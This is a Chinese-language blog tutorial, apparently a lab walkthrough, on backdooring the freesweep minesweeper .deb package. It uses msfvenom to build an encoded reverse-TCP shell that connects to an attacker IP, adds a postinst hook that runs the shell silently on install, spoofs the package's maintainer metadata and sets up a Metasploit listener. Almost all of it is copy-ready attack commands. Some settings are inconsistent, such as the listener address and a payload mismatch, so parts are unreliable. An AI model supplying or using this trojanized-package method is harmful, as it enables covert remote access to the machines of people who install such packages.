攻击机:192.168.132.144(kali1)
受害机:192.168.132.133(kali2)
本该是由攻击机生成恶意deb包,然后把包发给受害机让它访问然后监听的,但因为中间有一个包传递的过程,我就直接省略这一步直接在受害机里生成了,但监听地址是填写的攻击机。
1.第一步我们先下载所需的freesweep软件包(这里使用的是kali2)
apt --download-only install freesweep
2.将软件移动到root目录
mv /var/cache/apt/archives/freesweep_1.0.1-1_amd64.deb ~/
3.解压到指定free目录
dpkg -x freesweep_1.0.1-1_amd64.deb free
4.然后用msf生成恶意木马文件
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.132.144 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources
5.创建生成软件包目录
mkdir free/DEBIAN && cd free/DEBIAN
6.写入文件
vim /root/free/DEBIAN/control
内容:
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
(当然,version,Package后面的内容是可以自定义的)
7.安装后脚本文件
vim /root/free/DEBIAN/postinst
写入内容:
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
8.提权
chmod 755 /root/free/DEBIAN/postinst
9.构建新的deb安装包
dpkg-deb --build /root/free/
然后去看一下我们声称的deb安装包
ls /root/free.deb
10.然后我们开一个终端开始监听(这里就是在攻击机kali1下完成的了)
root@kali:~# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.132.133
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit
11.回到kali2受害机,采用我们的deb文件
dpkg -i free.deb
12.回到攻击机器的msf监听界面,发现已经进入
544
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
